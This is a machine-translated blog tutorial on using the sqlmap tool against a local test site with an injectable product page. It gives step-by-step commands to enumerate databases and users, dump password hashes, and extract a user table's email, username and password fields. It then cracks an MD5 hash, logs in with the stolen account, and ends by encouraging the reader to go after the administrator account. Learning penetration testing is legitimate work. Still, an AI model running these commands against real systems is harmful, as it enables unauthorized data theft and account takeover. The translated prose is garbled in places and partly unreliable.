Penetration Testing Tools sqlmap Basic Tutorials
Free Test URLs
Http://testphp.vulnweb.com/artists.php?artist=1
Tags: SQL injection penetration test Sqlmap2014-11-12 10:15 62345 People read comments (0) favorite reports Classification:Information Security
(1)
Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.
Directory (?) [+]
Reprint Please specify source: http://blog.csdn.net/zgyulongfei/article/details/41017493
Flying Dragon
This article is only dedicated to the study of penetration test sqlmap small white, Daniel please bypass.
>
>
For network security personnel, mastering the use of penetration tools is an essential skill. However, a no-teacher led by the small white at the beginning of the study, do not know how to start penetration learning, so this article is intended to help these small white primer.
Sqlmap is a very powerful open source SQL Automation injection tool that can be used to detect and exploit SQL injection vulnerabilities. It is developed by the Python language, so running requires a Python environment to be installed.
Now that this article is a basic tutorial, the following are the basics of how to use the tools.
This tutorial is for sqlmap specific application cases, if you need to know more sqlmap information can access the official http://sqlmap.org, or cloud Knowledge http://drops.wooyun.org/tips/401 and http:// drops.wooyun.org/tips/143.
Test environment: Locally built web site with SQL injection point http://192.168.1.150
Note: Sqlmap is only used to detect and exploit the SQL injection point, and does not scan the site for any vulnerabilities, use the Scan tool before using the SQL injection point.
Tutorial Start:
first, detection of the injection point is available
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"
Parameters:
-U: Specify the injection point URL
Results:
Injection results show:
(1) The injection parameter ID is get injection, the injection type has four kinds: boolean-based blind, error-based, stacked queries, inline query.
(2) Web Server System for Windows 2003 or XP
(3) Web application Technology: ASP. NET, Microsoft IIS 6.0
(4) database type: SQL Server 2000
There are several query statements in figure A, need user input [y/n], if you are too lazy to input or do not know how to input can let the program automatically input, just add a parameter, command as follows:
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--batch
Second, Bauku
A single command exposes all database names in the SQL Server command as follows:
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--dbs
Parameters:
There are two bars in front of the--dbs:dbs, please see clearly.
Results:
The results show that SQL Server contains 7 databases that are available.
third, the database currently used by the Web
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-db
Iv. use of the Web database account
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-user
v. List all users of SQL Server
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--users
vi. Database account and password
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--passwords
Vii. listing tables in a database
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata--tables
Parameters:
-D: Specify the database name
--tables: List Tables
Results:
The results reflect a total of 34 tables.
viii. listing fields in a table
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t UserB--columns
Parameters:
-D: Specify the database name
-T: Specify a table to list fields
--columns: Specify list fields
Results:
The results show that the UserB table contains 23 fields.
Nine, the Storm field content
[Plain]View Plain copy
- c:\python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/ products.asp?id=134 " -D tourdata -T userb -C " Email,username,userpassword " --dump
Parameters:
-C: Specify the field to be burst
--dump: Export the results
Results:
If the field is too much, it takes a lot of time. You can specify the export of a specific range of field content, with the following command:
[Plain]View Plain copy
- C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email, Username,userpassword "--start 1--stop--dump
Parameters:
--start: Specifies the starting line
--stop: Specifies the end of the line
The meaning of this command is: Export the data contents of rows 1th through 10th in the field (Email,username,userpassword) in table UserB in database Tourdata.
The results are as follows:
10. Verification Results
One of the user information that you see through the results is:
Email:[email protected]
Username:1.asp
password:49ba59abbe56e057
By MD5 decryption, the original password to get the hash is: 123456
Get the account password we will test whether you can log in, the results are as follows:
Verify success!
Of course, we just get the ordinary member account to log in, you can also get the Administrator account to log in, behind the things to play it, hey!
Penetration Testing Tools Sqlmap Basic Tutorials